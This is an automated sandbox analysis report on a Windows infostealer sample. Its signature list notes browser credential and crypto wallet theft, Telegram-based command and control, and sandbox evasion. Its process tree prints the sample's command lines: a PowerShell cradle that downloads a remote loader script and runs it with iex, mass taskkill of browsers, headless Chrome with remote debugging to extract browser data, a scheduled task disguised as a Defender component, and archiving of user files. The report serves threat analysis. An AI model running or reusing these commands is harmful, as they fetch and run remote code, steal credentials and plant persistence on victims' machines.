Edit tour
Windows
Analysis Report
SplpM1fFkV.exe
Overview
General Information
Sample name: | SplpM1fFkV.exerenamed because original name is a hash value |
Original sample name: | 770bc9a9a9ff4284b8cb6e333478d25c.exe |
Analysis ID: | 1567443 |
MD5: | 770bc9a9a9ff4284b8cb6e333478d25c |
SHA1: | 8f634709fea90f7b10a2612d250936f7459c7327 |
SHA256: | 6a915f0e2eaa35eb47d70a933a4d8822d65e64ebea485d9dcb5657f1f4bd1cf8 |
Tags: | exeuser-abuse_ch |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
AI detected suspicious sample
Excessive usage of taskkill to terminate processes
Found Tor onion address
Loading BitLocker PowerShell Module
Powershell drops PE file
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Classification
- System is w10x64
- SplpM1fFkV.exe (PID: 5952 cmdline:
"C:\Users\ user\Deskt op\SplpM1f FkV.exe" MD5: 770BC9A9A9FF4284B8CB6E333478D25C) - powershell.exe (PID: 6112 cmdline:
powershell -Command "iwr 'http s://github .com/EvilB ytecode/Sr yxen/relea ses/downlo ad/v1.0.0/ sryxen_loa der.ps1' | iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2584 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ReAgentc.exe (PID: 4592 cmdline:
reagentc.e xe /disabl e MD5: A109CC3B919C7D40E4114966340F39E5) - taskkill.exe (PID: 4564 cmdline:
taskkill / F /IM chro me.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 6004 cmdline:
taskkill / F /IM fire fox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 2944 cmdline:
taskkill / F /IM brav e.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 3556 cmdline:
taskkill / F /IM oper a.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 5588 cmdline:
taskkill / F /IM kome ta.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 1276 cmdline:
taskkill / F /IM orbi tum.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 1412 cmdline:
taskkill / F /IM cent browser.ex e MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 7056 cmdline:
taskkill / F /IM 7sta r.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 1272 cmdline:
taskkill / F /IM sput nik.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 6620 cmdline:
taskkill / F /IM viva ldi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 2804 cmdline:
taskkill / F /IM epic privacybro wser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 5568 cmdline:
taskkill / F /IM msed ge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 1680 cmdline:
taskkill / F /IM uran .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 3788 cmdline:
taskkill / F /IM yand ex.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 4072 cmdline:
taskkill / F /IM irid ium.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 6788 cmdline:
taskkill / F /IM chro me.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - chrome.exe (PID: 5136 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --re mote-debug ging-port= 9222 --rem ote-allow- origins=* --headless "--user-d ata-dir=C: \Users\use r\AppData\ Local\Goog le\Chrome\ User Data" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - taskkill.exe (PID: 180 cmdline:
taskkill / F /IM chro me.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 6188 cmdline:
taskkill / F /IM fire fox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 1848 cmdline:
taskkill / F /IM brav e.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 5268 cmdline:
taskkill / F /IM oper a.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 5804 cmdline:
taskkill / F /IM kome ta.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 3292 cmdline:
taskkill / F /IM orbi tum.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 2300 cmdline:
taskkill / F /IM cent browser.ex e MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 6772 cmdline:
taskkill / F /IM 7sta r.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 2108 cmdline:
taskkill / F /IM sput nik.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 5628 cmdline:
taskkill / F /IM viva ldi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 1560 cmdline:
taskkill / F /IM epic privacybro wser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 2408 cmdline:
taskkill / F /IM msed ge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 5404 cmdline:
taskkill / F /IM uran .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 4180 cmdline:
taskkill / F /IM yand ex.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - taskkill.exe (PID: 3496 cmdline:
taskkill / F /IM irid ium.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - schtasks.exe (PID: 616 cmdline:
schtasks.e xe /create /tn "Micr osoft Defe nder Threa t Intellig ence Handl er" /sc ON LOGON /tr C:\Users\u ser\AppDat a\Roaming\ DisplayDri verUpdater .exe /rl H IGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2) - powershell.exe (PID: 6136 cmdline:
powershell -Command $env:USERN AME MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5808 cmdline:
powershell -Command "Compress- Archive -P ath \"C:\U sers\user\ AppData\Lo cal\Temp\u ser\" -Des tinationPa th \"C:\Us ers\user\A ppData\Loc al\Temp\us er.zip\" - Force" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 5228 cmdline:
wmic os ge t caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 6308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 1876 cmdline:
wmic NIC g et MACAddr ess MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 616 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 1200 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- DisplayDriverUpdater.exe (PID: 6768 cmdline:
C:\Users\u ser\AppDat a\Roaming\ DisplayDri verUpdater .exe MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7064 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), frack113: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-03T15:26:59.938026+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49706 | 20.233.83.145 | 443 | TCP |
2024-12-03T15:27:01.675484+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 185.199.109.133 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Directory queried: |
Networking |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | Key opened: | ||
Source: | Key opened: | ||
Source: | Key opened: | ||
Source: | Key opened: | ||
Source: | Key opened: |
Source: | Key opened: | ||
Source: | Key opened: | ||
Source: | Key opened: | ||
Source: | Key opened: |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Code function: | 42_2_00007FF848F2DC18 | |
Source: | Code function: | 42_2_00007FF848F2F658 | |
Source: | Code function: | 42_2_00007FF848F26DA0 | |
Source: | Code function: | 42_2_00007FF848F26E20 | |
Source: | Code function: | 42_2_00007FF848F2EFCD |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Key opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | String found in binary or memory: |